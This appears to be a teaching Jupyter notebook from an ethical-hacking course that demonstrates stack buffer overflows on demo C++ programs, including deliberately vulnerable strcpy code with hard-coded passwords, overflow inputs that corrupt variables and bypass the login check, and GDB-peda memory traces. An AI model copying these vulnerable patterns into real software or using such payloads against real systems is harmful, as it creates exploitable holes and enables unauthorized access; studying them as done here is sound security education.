## Stack Overflow

- buffer overrun in the stack segment

## Stack overflow consequences

- stack overflow can violate all 3 CIA (Confidentialy, Integrity and Availability) security principles 

1. overwrite variable(s) with the data of your choice (Integrity)
2. change the flow of the program execution (Integrity)
3. remote code execution (Confidentiality, Integrity, Availability)

- let's look at the first two impact of stack overflow on this notebook

### Memory corruption

- overwrite data in memory
- voilates data integrity
- can overwrite variables with the data of your choice on the stack

- let's use some demo programs to demonstrate various consequences of stackoverflow

In [None]:
# let's demonstrate this
! cat ../demos/stack_overflow/memory_corruption.cpp

In [None]:
%%bash
input="../demos/stack_overflow/memory_corruption.cpp"
output="memory_corruption.exe"
echo kali | sudo -S ../demos/compile.sh $input $output

In [None]:
! ./memory_corruption.exe 
# segfault is bad!! provide some argument
# you don't see segfault in Jupyter notebook, but you can see it in terminal

In [None]:
# run the program providing some argument
! ./memory_corruption.exe hello
# notice the addresses of variables are shifted

In [None]:
# try a few some other values like 15 As
! ./memory_corruption.exe $(python3 -c 'print("A"*15)')
# observe the values of buffer_two and buffer_one, and num

In [None]:
# try 16 As
! ./memory_corruption.exe  $(python3 -c 'print("A"*16, end="")')
# observe the values of buffer_two and buffer_one, and num
# num is 0 which is ascii value of NULL

- try to overwrite num variable with "BCDE"
- how may bytes is num away from buffer_two? What's the offset of buffer_two with respect to num?
- find the difference between the address of value and buffer_two

In [None]:
# subtract the address of buffer_two from the address of num
# which variable is at higher location?
print(0xffffc414 - 0xffffc40c)

In [None]:
# we know that 16 byes is the offset! any longer text will modify the num variable
# try 16As+"BCDE" and notice the value of num
! ./memory_corruption.exe $(python3 -c 'print("A"*16 + "BCDE", end="")')

In [None]:
# check the hex values with python; also see the values of buffer_two and buffer_one
chr(int('42', 16))
# B is stored at the end!

In [None]:
# or find the hex representation of ASCII of B
ord('B')

In [None]:
# let's check that 0x45444342 is hex representation of 'BCDE' in reverse order
print(''.join(["{:02x}".format(ord(c)) for c in 'BCDE']))

### Recall x86 stores integers in little-endian!

In [None]:
# now try overwriting value with BCDE; in the right order
! ./memory_corruption.exe $(python3 -c 'print("A"*16 + "EDCB")')
# check if BCDE is in that order...
# remember x86 is little-endian, i.e., least significant byte is stored first

In [None]:
# can directly send hex values of EDCB
! ./memory_corruption.exe  $(python3 -c 'print("A"*16 + "\x45\x44\x43\x42")')

In [None]:
! ./memory_corruption.exe $(python3 -c 'print("A"*110000 + "\x1c\xc3\xff\xff")')

### draw stack of main( ) and answer the following questions
- what is the order of the variables pushed?
- when argv[1] is copied to buffer_two, what may happen to other variables?
- what caused the memory corruption?
- compile and run the program with some arguments

### Change the flow of the program execution
- due to buffer overflow, we can change the flow of the program execution especially if the program relies on the variable data on the stack
- violates the integriy of the program itself
- use ./demos/stack_overflow/authenticate.cpp program to demonstrate the impact

In [8]:
! cat ../demos/stack_overflow/authenticate.cpp

#include <cstring>
#include <iostream>
#include <cstdlib>

using namespace std;

int check_authentication(char *password) {
    int auth_flag = 0;
    char password_buffer[16];

    strcpy(password_buffer, password);

    if(strcmp(password_buffer, "brillig") == 0)
        auth_flag = 1;
    if(strcmp(password_buffer, "outgrabe") == 0)
        auth_flag = 1;

    return auth_flag;
}

int main(int argc, char *argv[]) {
    if(argc < 2) {
        cout << "Usage: " << argv[0] << " password\n";
        exit(0);
    }
    if(check_authentication(argv[1])) {
        cout << "\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n";
        cout << "      Access Granted.\n";
        cout << "-=-=-=-=-=-=-=-=-=-=-=-=-=-\n";
    } 
    else
        cout << "\nAccess Denied.\n";
    return 0;
}
	


In [2]:
%%bash
# let's compile the program
input="../demos/stack_overflow/authenticate.cpp"
output="authenticate.exe"
#echo kali | sudo -S ../demos/compile.sh $input $output
g++ -m32 -o $output $input

In [3]:
# run the program; gives help on how to run it properly
! ./authenticate.exe

Usage: ./authenticate.exe password


In [4]:
# authenticate with hard-coded password: outgrabe
! ./authenticate.exe outgrabe


-=-=-=-=-=-=-=-=-=-=-=-=-=-
      Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-


In [6]:
# authenticate with hardcoded password: brillig
! ./authenticate.exe brillig


-=-=-=-=-=-=-=-=-=-=-=-=-=-
      Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-


In [7]:
# any other password shouldn't work!
! ./authenticate.exe ard


Access Denied.


### authenticate without correct password

In [9]:
# since password_buffer is 16 bytes, let's provide 16 As as password
! ./authenticate.exe $(python -c 'print("A"*16)')


Access Denied.


In [10]:
# how about 17 As?
! ./authenticate.exe $(python -c 'print("A"*17)')


-=-=-=-=-=-=-=-=-=-=-=-=-=-
      Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-


### TODO
- draw stack of check_authentication( ) 
- explain why 17As lets you in!

### verify with gdb-peda
- run the program in GDB to see the address of auth_flag relative to that of password_buffer
- peda will show address of both password_buffer and auth_flag in stack context
- observe the value of auth_flag; any int value other than 0 is treated as true!
- make sure peda (python exploit development assistante) is installed (see [GDB Peda Notebook](./GDB-Peda.ipynb)

- load authenticate.exe into gdb

```bash
┌──(kali㉿K)-[~/EthicalHacking]
└─$ gdb -q authenticate.exe
Reading symbols from authenticate.exe...
```

- set a break point at check_authentication function
```bash
gdb-peda$ break check_authentication
Breakpoint 1 at 0x80491c4: file demos/stack_overflow/authenticate.cpp, line 7.
```

- run the program with 17 A's as argument

```bash
gdb-peda$ run $(python3 -c 'print("A"*17)')
Starting program: /home/kali/EthicalHacking/authenticate.exe $(python3 -c 'print("A"*17)')
[----------------------------------registers-----------------------------------]
EAX: 0xffffc6d0 ('A' <repeats 17 times>)
EBX: 0x804c000 --> 0x804bf04 --> 0x1 
ECX: 0xffffc3b0 --> 0x2 
EDX: 0xffffc3e4 --> 0x0 
ESI: 0xffffc3b0 --> 0x2 
EDI: 0xf7de6000 --> 0x1e4d6c 
EBP: 0xffffc368 --> 0xffffc398 --> 0x0 
ESP: 0xffffc340 --> 0xf7e81ae0 (<_ZNSt8ios_base4InitD2Ev>:      push   ebp)
EIP: 0x80491c4 (<_Z20check_authenticationPc+18>:        mov    DWORD PTR [ebp-0xc],0x0)
EFLAGS: 0x216 (carry PARITY ADJUST zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x80491b6 <_Z20check_authenticationPc+4>:    sub    esp,0x24
   0x80491b9 <_Z20check_authenticationPc+7>:    call   0x80490f0 <__x86.get_pc_thunk.bx>                             
   0x80491be <_Z20check_authenticationPc+12>:   add    ebx,0x2e42                                                    
=> 0x80491c4 <_Z20check_authenticationPc+18>:   mov    DWORD PTR [ebp-0xc],0x0                                       
   0x80491cb <_Z20check_authenticationPc+25>:   sub    esp,0x8                                                       
   0x80491ce <_Z20check_authenticationPc+28>:   push   DWORD PTR [ebp+0x8]                                           
   0x80491d1 <_Z20check_authenticationPc+31>:   lea    eax,[ebp-0x1c]                                                
   0x80491d4 <_Z20check_authenticationPc+34>:   push   eax                                                           
[------------------------------------stack-------------------------------------]                                     
0000| 0xffffc340 --> 0xf7e81ae0 (<_ZNSt8ios_base4InitD2Ev>:     push   ebp)
0004| 0xffffc344 --> 0x804c031 --> 0x0 
0008| 0xffffc348 --> 0x804c02c --> 0x0 
0012| 0xffffc34c --> 0x8049333 (<__static_initialization_and_destruction_0(int, int)+12>:       add    ebx,0x2ccd)
0016| 0xffffc350 --> 0x0 
0020| 0xffffc354 --> 0x2 
0024| 0xffffc358 --> 0xffffc378 --> 0x804c000 --> 0x804bf04 --> 0x1 
0028| 0xffffc35c --> 0x804939f (<_GLOBAL__sub_I__Z20check_authenticationPc()+31>:       add    esp,0x10)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, check_authentication (password=0xffffc6d0 'A' <repeats 17 times>)
    at demos/stack_overflow/authenticate.cpp:7
7           int auth_flag = 0;
```

- step through the code and stop after strcpy(password_buffer, password);
- entering next command twice will do it

```bash
gdb-peda$ n

gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0xffffc34c ('A' <repeats 17 times>)
EBX: 0x804c000 --> 0x804bf04 --> 0x1 
ECX: 0xffffc6e0 --> 0x4f430041 ('A')
EDX: 0xffffc35c --> 0x41 ('A')
ESI: 0xffffc3b0 --> 0x2 
EDI: 0xf7de6000 --> 0x1e4d6c 
EBP: 0xffffc368 --> 0xffffc398 --> 0x0 
ESP: 0xffffc340 --> 0xf7e81ae0 (<_ZNSt8ios_base4InitD2Ev>:      push   ebp)
EIP: 0x80491dd (<_Z20check_authenticationPc+43>:        sub    esp,0x8)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x80491d4 <_Z20check_authenticationPc+34>:   push   eax
   0x80491d5 <_Z20check_authenticationPc+35>:   call   0x8049090 <strcpy@plt>
   0x80491da <_Z20check_authenticationPc+40>:   add    esp,0x10
=> 0x80491dd <_Z20check_authenticationPc+43>:   sub    esp,0x8
   0x80491e0 <_Z20check_authenticationPc+46>:   lea    eax,[ebx-0x1ff7]
   0x80491e6 <_Z20check_authenticationPc+52>:   push   eax
   0x80491e7 <_Z20check_authenticationPc+53>:   lea    eax,[ebp-0x1c]
   0x80491ea <_Z20check_authenticationPc+56>:   push   eax
[------------------------------------stack-------------------------------------]
0000| 0xffffc340 --> 0xf7e81ae0 (<_ZNSt8ios_base4InitD2Ev>:     push   ebp)
0004| 0xffffc344 --> 0x804c031 --> 0x0 
0008| 0xffffc348 --> 0x804c02c --> 0x0 
0012| 0xffffc34c ('A' <repeats 17 times>)
0016| 0xffffc350 ('A' <repeats 13 times>)
0020| 0xffffc354 ("AAAAAAAAA")
0024| 0xffffc358 ("AAAAA")
0028| 0xffffc35c --> 0x41 ('A')
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
12          if(strcmp(password_buffer, "brillig") == 0)
```

- now the password is copeid to password_buffer, let's see the values of couple of stack variables

```bash
gdb-peda$ p/s password_buffer 
$1 = 'A' <repeats 16 times>

gdb-peda$ p/d auth_flag
$2 = 65
```

- why was auth_flag overwritten?
- let's print the addresses of these variables to answer it

```bash
gdb-peda$ p &password_buffer 
$3 = (char (*)[16]) 0xffffc34c

gdb-peda$ p &auth_flag
$4 = (int *) 0xffffc35c
```

- address of auth_flag is at a higher address compared to the address of password_buffer
- let's subtract the the address of password_buffer from auth_flag to find the difference; positive means the auth_flag is at larger address

In [None]:
print(0xffffc35c - 0xffffc34c)

### variables declaration order

- can you still overflow if the variable declaration orders are switched?
- normally, variables are pushed on the stack as they're loaded from top to bottom
    - the last variable decalred will be pushed last on the top of the stack

### TODO

- let's look at an example program demos/stack_overflow/authenticate2.cpp

- draw stack
- verify it using GDB

In [16]:
! cat ../demos/stack_overflow/authenticate2.cpp

#include <cstring>
#include <iostream>
#include <cstdlib>

using namespace std;

bool check_authentication(char *password) {
    char password_buffer[16];
    bool auth_flag = false;

    strcpy(password_buffer, password);

    if(strcmp(password_buffer, "brillig") == 0)
        auth_flag = true;
    if(strcmp(password_buffer, "outgrabe") == 0)
        auth_flag = true;

    return auth_flag;
}

int main(int argc, char *argv[]) {
    if(argc < 2) {
        cout << "Usage: " << argv[0] << " password\n";
        exit(0);
    }
    if(check_authentication(argv[1])) {
        cout << "\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n";
        cout << "      Access Granted.\n";
        cout << "-=-=-=-=-=-=-=-=-=-=-=-=-=-\n";
    } 
    else
        cout << "\nAccess Denied.\n";
    return 0;
}
	


In [17]:
%%bash
# let's compile the program
input="../demos/stack_overflow/authenticate2.cpp"
output="authenticate2.exe"
echo kali | sudo -S ../demos/compile.sh $input $output

[sudo] password for kali: 

In [18]:
# run the program with 17As
! ./authenticate2.exe $(python3 -c 'print("A"*17, end="")')


-=-=-=-=-=-=-=-=-=-=-=-=-=-
      Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-


### How is it possible?

- see in gdb where `auth_flag` is relative to `password_buffer`
- auth_flag must be still at higher address (pushed before) compared to password_buffer
- one plausible explanation is compiler optimization
- if auth_flag is in lower address compared to password_buffer, you can't overwrite it by oveflowing password_buffer
    - however, you can still overwrite other part of the memory including caller's return address (
    - well, let's keep going... :)